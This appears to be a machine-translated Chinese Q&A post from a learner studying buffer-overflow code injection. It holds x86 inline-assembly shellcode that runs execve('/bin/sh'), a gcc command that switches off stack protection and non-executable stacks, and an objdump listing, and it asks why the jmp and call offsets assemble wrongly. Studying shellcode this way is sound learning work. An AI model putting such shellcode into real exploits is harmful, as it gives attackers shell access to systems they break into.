我正在尝试通过缓冲区溢出来研究代码注入。我想将以下代码注入堆栈:
#include <stdio.h>
void main() {
char *name[2];
name[0] = "/bin/sh";
name[1] = NULL;
execve(name[0], name, NULL);
}
我写了以下与此相对应的汇编指令。
void main() {
__asm__("jmp 0x2a\n\t" // 3 bytes - jumps to last instruction
"popl %esi\n\t" // 1 byte - get the return address i.e. address of string in register
"movl %esi,0x8(%esi)\n\t" // 3 bytes - push contents on stack for syscall
"movb $0x0,0x7(%esi)\n\t" // 4 bytes - push contents on stack for syscall
"movl $0x0,0xc(%esi)\n\t" // 7 bytes - push contents on stack for syscall
"movl $0xb,%eax\n\t" // 5 bytes - store syscall id 11 to register
"movl %esi,%ebx\n\t" // 2 bytes - prepare registers for exec syscall
"leal 0x8(%esi),%ecx\n\t" // 3 bytes - prepare registers for exec syscall
"leal 0xc(%esi),%edx\n\t" // 3 bytes - prepare registers for exec syscall
"int $0x80\n\t" // 2 bytes - actual exec syscall
"movl $0x1, %eax\n\t" // 5 bytes - prepare registers for exit syscall in case exec fails
"movl $0x0, %ebx\n\t" // 5 bytes - prepare registers for exit syscall
"int $0x80\n\t" // 2 bytes - exit syscall
"call -0x2f\n\t" // 5 bytes - jumps to second instruction pushing the address of string "/bin/sh" on the stack.
".string \"/bin/sh\"\n\t"); // 8 bytes
}
通过
编译上述程序gcc shellcodeasm.c -m32 -g -o shellcode -fno-stack-protector -z execstack -static
和
运行objdump -S shellcode
我为main获得了以下转储:
08048e24 <main>:
void main() {
8048e24: 55 push %ebp
8048e25: 89 e5 mov %esp,%ebp
__asm__("jmp 0x2a\n\t" // 3 bytes - jumps to second last instruction
8048e27: e9 fe 71 fb f7 jmp 2a <data.8998+0x6>
8048e2c: 5e pop %esi
8048e2d: 89 76 08 mov %esi,0x8(%esi)
8048e30: c6 46 07 00 movb $0x0,0x7(%esi)
8048e34: c7 46 0c 00 00 00 00 movl $0x0,0xc(%esi)
8048e3b: b8 0b 00 00 00 mov $0xb,%eax
8048e40: 89 f3 mov %esi,%ebx
8048e42: 8d 4e 08 lea 0x8(%esi),%ecx
8048e45: 8d 56 0c lea 0xc(%esi),%edx
8048e48: cd 80 int $0x80
8048e4a: b8 01 00 00 00 mov $0x1,%eax
8048e4f: bb 00 00 00 00 mov $0x0,%ebx
8048e54: cd 80 int $0x80
8048e56: e8 76 71 fb f7 call ffffffd1 <_end+0xf7f14ccd>
8048e5b: 2f das
8048e5c: 62 69 6e bound %ebp,0x6e(%ecx)
8048e5f: 2f das
8048e60: 73 68 jae 8048eca <__libc_start_main+0x5a>
8048e62: 00 5d c3 add %bl,-0x3d(%ebp)
8048e65: 66 90 xchg %ax,%ax
8048e67: 66 90 xchg %ax,%ax
8048e69: 66 90 xchg %ax,%ax
8048e6b: 66 90 xchg %ax,%ax
8048e6d: 66 90 xchg %ax,%ax
8048e6f: 90 nop
除第一个 jmp 和最后一个调用指令外,每条指令都符合预期。我希望 jmp指令跳转到调用指令但是没有发生。相反,它的论点是显示其他 2a data.8998 + 0x6 ,我不明白。请告诉我我错在哪里。还要帮助我做些什么才能让它发挥作用。